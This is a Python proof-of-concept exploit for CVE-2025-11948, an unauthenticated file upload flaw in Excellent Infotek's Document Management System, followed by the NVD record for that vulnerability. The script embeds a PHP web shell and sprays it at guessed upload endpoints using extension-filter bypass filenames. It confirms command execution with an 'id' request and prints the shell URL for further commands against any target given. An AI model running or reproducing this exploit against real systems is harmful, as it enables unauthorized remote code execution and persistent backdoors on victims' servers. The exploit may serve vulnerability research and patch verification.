CVE-2025-11948

#!/usr/bin/env python3 # CVE-2025-11948 - Excellent Infotek DMS Arbitrary File Upload PoC # Exploits unrestricted file upload to achieve RCE via Web Shell import requests import sys import argparse from urllib.parse import urljoin def exploit(target_url, shell_path="/uploads/"): """ Exploit arbitrary file upload vulnerability in Excellent Infotek DMS. Uploads a PHP web shell and executes system commands. """ session = requests.Session() # PHP web shell payload - simple command execution shell_content = b"""<?php if(isset($_REQUEST['cmd'])){ echo "<pre>" . shell_exec($_REQUEST['cmd']) . "</pre>"; } ?>""" # Common upload endpoints for Document Management Systems upload_endpoints = [ "/upload.php", "/document/upload", "/file/upload", "/dms/upload", "/api/upload", "/index.php?action=upload", "/includes/upload.php" ] # File names to try - bypass extension filters filenames = [ "shell.php", "shell.phtml", "shell.php5", "shell.pHp", "shell.jpg.php", # double extension bypass "shell.php;.jpg", # null byte / semicolon bypass ] for endpoint in upload_endpoints: upload_url = urljoin(target_url, endpoint) for filename in filenames: try: # Prepare multipart form data files = { "file": (filename, shell_content, "application/x-php"), "document": (filename, shell_content, "application/x-php"), "upload": (filename, shell_content, "application/x-php"), } data = { "action": "upload", "category": "document", "submit": "Upload" } print(f"[*] Trying: {upload_url} with filename: {filename}") response = session.post(upload_url, files=files, data=data, timeout=10) if response.status_code == 200: # Try to find uploaded shell location in response shell_url = urljoin(target_url, shell_path + filename) # Verify shell access verify = session.get(shell_url + "?cmd=id", timeout=10) if verify.status_code == 200 and ("uid=" in verify.text or "www-data" in verify.text): print(f"[+] SUCCESS! Web Shell uploaded to: {shell_url}") print(f"[+] Command execution confirmed: {verify.text.strip()}") return shell_url # Try alternative paths for path in ["/uploads/", "/files/", "/documents/", "/data/", "/storage/"]: alt_url = urljoin(target_url, path + filename) verify = session.get(alt_url + "?cmd=id", timeout=10) if verify.status_code == 200 and "uid=" in verify.text: print(f"[+] SUCCESS! Web Shell at: {alt_url}") return alt_url except requests.exceptions.RequestException as e: continue print("[-] Exploit failed. Target may be patched or endpoint not found.") return None if __name__ == "__main__": parser = argparse.ArgumentParser(description="CVE-2025-11948 PoC Exploit") parser.add_argument("target", help="Target URL (e.g., http://target.com/dms)") args = parser.parse_args() print(f"[*] Targeting: {args.target}") result = exploit(args.target) if result: print(f"\n[+] Exploit successful! Access shell at: {result}?cmd=<command>") print("[+] Example: " + result + "?cmd=whoami") else: sys.exit(1)

{"cve": {"id": "CVE-2025-11948", "sourceIdentifier": "[email protected]", "published": "2025-10-20T04:15:36.293", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Document Management System developed by Excellent Infotek has an Arbitrary File Upload vulnerability, allowing unauthenticated remote attackers to upload and execute web shell backdoors, thereby enabling arbitrary code execution on the server."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 9.3, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-434"}]}], "references": [{"url": "https://www.twcert.org.tw/en/cp-139-10453-43e63-2.html", "source": "[email protected]"}, {"url": "https://www.twcert.org.tw/tw/cp-132-10452-72cb6-1.html", "source": "[email protected]"}, {"url": "https://www.chtsecurity.com/news/3575ad9c-31f4-49de-8bc4-de85bb2eed39", "source": "af854a3a-2127-422b-91ae-364da2661108"}]}}